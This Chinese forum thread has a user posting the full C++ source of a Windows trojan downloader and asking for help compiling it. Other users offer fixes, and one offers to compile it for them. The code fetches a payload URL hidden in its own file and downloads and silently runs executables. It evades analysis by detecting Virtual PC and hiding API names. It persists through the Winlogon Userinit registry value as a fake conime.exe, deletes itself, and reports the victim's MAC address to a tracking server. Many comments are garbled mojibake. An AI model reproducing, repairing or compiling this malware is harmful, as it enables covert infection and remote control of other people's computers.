C语言的大牛进来下。小弟实在看不懂了

[C++] 纯文本查看 复制代码

#include <stdio.h>
#include <shlwapi.h>
#include<wininet.h>
#pragma comment(lib,"wininet.lib")
#pragma comment(lib,"shlwapi.lib")
#pragma comment(lib,"MSVCRT.lib")
#pragma comment (lib,"Urlmon.lib")
#pragma comment(linker, "/OPT:NOWIN98")    //è&#161;&#207;&#251;&#213;a&#188;&#184;DDμ&#196;×￠êí￡&#172;±àò&#235;3&#246;μ&#196;&#206;&#196;&#188;t&#214;&#187;óD2K′óD&#161;
#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/subsystem:windows") 
#pragma comment(linker,"/ENTRY:ProcEntry /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
#include <time.h>
#include <winsock.h>
#include <stdlib.h>
#include <Wininet.h>
#include<Aclapi.h>
#include <io.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"ws2_32")


DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//&#182;ˉì&#172;&#188;ó&#212;&#216;Urlmon.dll&#214;Dμ&#196;UrlDownloadToFileAoˉêy
HINSTANCE hurlmon;

int memfind(const char *mem, const char *str, int sizem, int sizes)   
{   
	int   da,i,j;   
	if (sizes == 0) da = strlen(str);   
	else da = sizes;   
	for (i = 0; i < sizem; i++)   
	{   
		for (j = 0; j < da; j ++)   
			if (mem[i+j] != str[j])	break;   
			if (j == da) return i;   
	}   
	return -1;   
}

#define	MAX_CONFIG_LEN	500
LPCTSTR FindConfigString( LPCTSTR lpString)//2é&#213;ò&#206;&#196;&#188;t&#196;&#169;&#206;2μ&#196;&#197;&#228;&#214;&#195;D&#197;&#207;￠
{
	char	strFileName[MAX_PATH];
	char	*lpConfigString = NULL;
	DWORD	dwBytesRead = 0;
	GetModuleFileName(0, strFileName, sizeof(strFileName));
	
	HANDLE	hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		return NULL;
	}
	
	SetFilePointer(hFile, -MAX_CONFIG_LEN, NULL, FILE_END);
	lpConfigString = new char[MAX_CONFIG_LEN];
	ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL);
	CloseHandle(hFile);
	
	int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0);
	if (offset == -1)
	{
		delete lpConfigString;
		return NULL;
	}
	else
	{
		return lpConfigString + offset;
	}
}

int DownExe()
{
	char  strDown[19]; 
	strDown[0]  = 'U';
	strDown[1]  = 'R';
	strDown[2]  = 'L';
	strDown[3]  = 'D';
	strDown[4]  = 'o';
	strDown[5]  = 'w';
	strDown[6]  = 'n';
	strDown[7]  = 'l';
	strDown[8]  = 'o';
	strDown[9]  = 'a';
	strDown[10] = 'd';
	strDown[11] = 'T';
	strDown[12] = 'o';
	strDown[13] = 'F';
	strDown[14] = 'i';
	strDown[15] = 'l';
	strDown[16] = 'e';
	strDown[17] = 'A';
	strDown[18] = '\0';
	//MessageBox(0,strDown,"ok", 0);
	
	char  urlmon[11]; 
	urlmon[0]  = 'u';
	urlmon[1]  = 'r';
	urlmon[2]  = 'l';
	urlmon[3]  = 'm';
	urlmon[4]  = 'o';
	urlmon[5]  = 'n';
	urlmon[6]  = '.';
	urlmon[7]  = 'd';
	urlmon[8]  = 'l';
	urlmon[9]  = 'l';
	urlmon[10]  = '\0';
	//MessageBox(0,urlmon,"ok", 0);
	
	char  FindStr[7]; 
	FindStr[0]  = 'O';
	FindStr[1]  = 'O';
	FindStr[2]  = 'O';
	FindStr[3]  = 'O';
	FindStr[4]  = 'O';
	FindStr[5]  = 'O';
	FindStr[6]  = '\0';
	
	
	char *url = NULL;
	char *DownUrl = NULL;
	char *SavePath = NULL;
	url = (char *)FindConfigString(FindStr);
	
	char	*pos = strchr(url, '|'); //&#213;a&#184;&#246;oí&#184;&#213;2&#197;μ&#196;&#214;&#187;óDò&#187;μ&#227;2&#187;í&#172;￡&#172;&#190;íê&#199;&#196;ü&#182;à&#182;áè&#161;ò&#187;&#184;&#246;êy&#190;Y￡&#172;&#213;aá&#189;&#184;&#246;êy&#190;Y&#214;&#174;&#188;&#228;ó&#195;&#161;°|&#161;±&#184;&#244;&#191;a
	if (pos == NULL)
		return -1;
	*pos = '\0';
	DownUrl = url + 6;
	SavePath = pos + 1;
	if (DownUrl == NULL || SavePath == NULL)
		return -1;
	
	//MessageBox(0,DownUrl,"ok",0);//°&#209;·&#214;à&#235;3&#246;à′μ&#196;á&#189;&#184;&#246;×&#214;·&#251;′&#174;&#207;&#212;ê&#190;3&#246;à′
	//MessageBox(0,SavePath,"ok",0);
	
    hurlmon=LoadLibrary(urlmon);
    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,strDown);
	HRESULT hr = DOWNFILE(NULL, DownUrl, SavePath, 0, NULL);

	char strTmpPath[MAX_PATH];
	char strRunPath[MAX_PATH];
	GetTempPath(sizeof(strTmpPath), strTmpPath);
	
	FILE *stream;
	char buffer[200];
	stream  = fopen(SavePath,"r");
	if (hr== S_OK)
	{
		while(fscanf(stream,"%s\n",buffer)==1)
		{
			wsprintf(strRunPath,"%s\\%d.exe",strTmpPath,GetTickCount());
			DOWNFILE(0, buffer, strRunPath, 0, 0);
			//MessageBox(NULL,buffer,"ìáê&#190;",MB_ICONINFORMATION);
			WinExec(strRunPath, SW_SHOW);  
		}
		
		fclose(stream); 
	}
	DeleteFile(SavePath);
	return 0;
}

bool IsVirtualPC()//·′nod322éé±
{
	__try
	{
		__asm
		{
			mov eax, 1
				_emit 0x0F
				_emit 0x3F
				_emit 0x07
				_emit 0x0B
				_emit 0xC7
				_emit 0x45
				_emit 0xFC
				_emit 0xFF
				_emit 0xFF
				_emit 0xFF
				_emit 0xFF
		}
	}
	__except(1)
	{
		return FALSE;
	}
	return TRUE;
}


void WriteReg()//D′×￠2á±írun
{
	char WinPath[MAX_PATH];
	char OldPath[MAX_PATH];
	char MyPath[MAX_PATH];
	char RegStr[MAX_PATH];
	GetWindowsDirectory(WinPath,sizeof(WinPath));//μ&#195;μ&#189;windows&#196;&#191;&#194;&#188;
	wsprintf(OldPath,"%s%s",WinPath,"\\system32\\userinit.exe");
	wsprintf(MyPath,"%s%s",WinPath,"\\Tasks\\conime.exe");
	wsprintf(RegStr,"%s%s%s",OldPath,",",MyPath);
	char regname[]="Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon";
	HKEY hkResult;
	int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);                            //′ò&#191;a1&#216;&#188;ü×&#214;
	ret=RegSetValueEx(hkResult,"Userinit",0,REG_SZ,(unsigned char *)RegStr,100);	/*éè&#214;&#195;&#188;ü&#214;μ*/
	RegCloseKey(hkResult);
}
//×&#212;é&#190;3y
void uninstall(void)
{
	int i;
	HANDLE hFile;
	DWORD dwWritten;
	char selfpathaaa[MAX_PATH]={0};
	char command[2048]={0};
	char name[]="afc9fe2f418b00a0.bat";
	GetModuleFileName(NULL,selfpathaaa,MAX_PATH);
	lstrcpy(command,"@echo off\n\r");
	for (i=0;i<10;i++) 
		lstrcat(command,"@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq\n\r");
	lstrcat(command,"@del 3596799a1543bc9f.aqq\n\r");
	lstrcat(command,"@del \"");
	lstrcat(command,selfpathaaa);
	lstrcat(command,"\"\n\r");
	lstrcat(command,"@del ");
	lstrcat(command,name);
	lstrcat(command,"\n\r@exit");
	hFile=CreateFile(name,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
	WriteFile(hFile,(LPCVOID)command,sizeof(command),&dwWritten,NULL);
	CloseHandle(hFile);
	WinExec(name,SW_HIDE);
	ExitProcess(NULL);
}


char   *ltrim_VVVVVV(char   *pstr)   
{   
	while(*pstr++=='V');   
	return   --pstr;   
}
char   *ltrim_CCCCCC(char   *pstr)   
{   
	while(*pstr++=='C');   
	return   --pstr;   
}

#include "Rpcdce.h" 
#pragma comment(lib,"Rpcrt4.lib") 
void MyCount()
{
	char szURL[MAX_PATH];

	char *MyUrl = NULL;
	char *CountUrl = NULL;
	MyUrl = (char *)FindConfigString("CCCCCC");
	CountUrl = ltrim_CCCCCC(MyUrl);


	char *pVersionStr = NULL;
	char *pVersion = NULL;
	pVersionStr = (char *)FindConfigString("VVVVVV");
	pVersion = ltrim_VVVVVV(pVersionStr);
	
	long rt;  
	UUID ui;
	char mac[6][10]={0};
	char temp[MAX_PATH];
	char Mac[MAX_PATH];
	rt = UuidCreateSequential(&ui);
	if (rt == RPC_S_OK)
	{
        _itoa(ui.Data4[2],mac[0],16);
		_itoa(ui.Data4[3],mac[1],16);
		_itoa(ui.Data4[4],mac[2],16);
		_itoa(ui.Data4[5],mac[3],16);
		_itoa(ui.Data4[6],mac[4],16);
		_itoa(ui.Data4[7],mac[5],16);
	}
	for(int n=0;n<6;n++)
	{
		if (strlen(mac[n]) == 1)
		{
            wsprintf(temp, "0%s", mac[n]);
            strcpy(mac[n],temp);
		}
	}
	wsprintf(Mac, "%s-%s-%s-%s-%s-%s",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]);

	sprintf(szURL,"%s?mac=%s&ver=%s",CountUrl,Mac,pVersion);				//ó&#195;è&#171;&#190;&#214;&#203;&#230;&#187;ú′&#174;×&#246;&#206;¨ò&#187;±ê&#188;&#199;
	//MessageBox(NULL,szURL,"ìáê&#190;",MB_ICONINFORMATION);

	HINTERNET hNet = ::InternetOpen("Google page", //μ±HTTPD-òéê1ó&#195;ê±￡&#172;&#213;a&#184;&#246;2&#206;êy&#203;&#230;òa&#184;3&#214;μ
		PRE_CONFIG_INTERNET_ACCESS, //·&#195;&#206;êààDí&#214;&#184;ê&#190;Win32í&#248;&#194;&#231;oˉêyê1ó&#195;μ&#199;&#188;&#199;D&#197;&#207;￠è￥·￠&#207;&#214;ò&#187;&#184;&#246;·t&#206;&#241;&#198;÷&#161;￡
		NULL,
		INTERNET_INVALID_PORT_NUMBER, //ê1ó&#195;INTERNET_INVALID_PORT_NUMBER&#207;àμ±óúìá1&#169;è′ê&#161;μ&#196;&#182;&#203;&#191;úêy&#161;￡
		0 //±ê&#214;&#190;è￥&#214;&#184;ê&#190;ê1ó&#195;·μ&#187;&#216;&#190;&#228;&#190;&#228;±úμ&#196;&#189;&#171;à′μ&#196;Internetoˉêy&#189;&#171;"2&#187;"&#206;a&#187;&#216;μ÷oˉêy·￠&#203;í×′ì&#172;D&#197;&#207;￠
		) ;
	HINTERNET hUrlFile = ::InternetOpenUrl(hNet, //′óInternetOpen·μ&#187;&#216;μ&#196;&#190;&#228;±ú
		szURL, //Dèòa′ò&#191;aμ&#196;URL
		NULL, //ó&#195;à′&#207;ò·t&#206;&#241;&#198;÷′&#171;&#203;í&#182;&#238;íaμ&#196;D&#197;&#207;￠,ò&#187;°&#227;&#206;aNULL
		0, //ó&#195;à′&#207;ò·t&#206;&#241;&#198;÷′&#171;&#203;í&#182;&#238;íaμ&#196;D&#197;&#207;￠,ò&#187;°&#227;&#206;a 0
		INTERNET_FLAG_RELOAD, //InternetOpenUrlDD&#206;aμ&#196;±ê&#214;&#190;
		0) ; //D&#197;&#207;￠&#189;&#171;2&#187;&#187;á±&#187;&#203;íμ&#189;×′ì&#172;&#187;&#216;μ÷oˉêy
	
	char buffer[1024] ;
	DWORD dwBytesRead = 0;
	BOOL bRead = ::InternetReadFile(hUrlFile, //InternetOpenUrl·μ&#187;&#216;μ&#196;&#190;&#228;±ú
		buffer, //±￡á&#244;êy&#190;Yμ&#196;&#187;o3&#229;&#199;&#248;
		sizeof(buffer),
		&dwBytesRead); //&#214;&#184;&#207;ò°üo&#172;&#182;áè&#235;&#187;o3&#229;&#199;&#248;×&#214;&#189;úêyμ&#196;±&#228;á&#191;μ&#196;&#214;&#184;&#213;&#235;;
	//è&#231;1&#251;·μ&#187;&#216;&#214;μê&#199;TRUE￡&#172;&#182;&#248;&#199;ò&#213;aà&#239;&#214;&#184;&#207;ò0￡&#172;&#212;ò&#206;&#196;&#188;tò&#209;&#190;-&#182;áμ&#189;á&#203;&#206;&#196;&#188;tμ&#196;&#196;&#169;&#206;2&#161;￡
	
	::InternetCloseHandle(hUrlFile) ;
	::InternetCloseHandle(hNet) ;
}


int ProcEntry()
{
	if(IsVirtualPC())
	{
		return 0;
	}
	char Mulu[MAX_PATH];
	char WinPath[MAX_PATH];
	char MyPath[MAX_PATH];

	GetModuleFileName(0,Mulu,sizeof(Mulu));
	PathRemoveFileSpec(Mulu);
	
	GetWindowsDirectory(WinPath,sizeof(WinPath));//μ&#195;μ&#189;windows&#196;&#191;&#194;&#188;
	strcat(WinPath,"\\Tasks");
	GetModuleFileName(0,MyPath,sizeof(MyPath));

	//MessageBox(NULL,Mulu,"ìáê&#190;",MB_ICONINFORMATION);
	//MessageBox(NULL,WinPath,"ìáê&#190;",MB_ICONINFORMATION);
	if (stricmp(Mulu,WinPath) != 0)		//è&#231;1&#251;×&#212;&#188;o2&#187;&#212;úwindows&#196;&#191;&#194;&#188;&#190;í&#184;′&#214;&#198;μ&#189;&#196;&#199;à&#239;è￥
	{
		strcat(WinPath,"\\conime.exe");
		DeleteFile(WinPath);
		WriteReg();//D′×￠2á±íò&#212;′&#239;μ&#189;×&#212;&#198;&#244;&#182;ˉμ&#196;&#196;&#191;μ&#196;
		CopyFile(MyPath,WinPath,false);
		Sleep(500);
		WinExec(WinPath,SW_HIDE);
		Sleep(1000);
		uninstall();
		ExitProcess(0);
	}

	int i = 0;
	while(i < 6)	//&#188;&#228;&#184;&#244;20·&#214;&#214;ó&#207;&#194;&#212;&#216;
	{
		DownExe();
		MyCount();	//í3&#188;&#198;
		Sleep(20 * 60 * 1000);
		i++;
	}
	ExitProcess(0);
	return 0;
} 

该怎么修改  麻烦大牛说下

把你的那个CPP文件发出来，问题在那，而不是shlwapi.h，VC++6.0比较笨

我不是大牛。我也进来看看

你把系统头文件发出来有何用

LYQingYe 发表于 2016-8-4 08:30
你把系统头文件发出来有何用

发出来了   麻烦看下

几何 发表于 2016-8-4 07:25
把你的那个CPP文件发出来，问题在那，而不是shlwapi.h，VC++6.0比较笨

发出来了  麻烦看下

fresharplite 发表于 2016-8-4 06:15
在代码最前面
     #define EXTERN_C     extern "C"

表示没搞懂

发代码来我帮你编译算了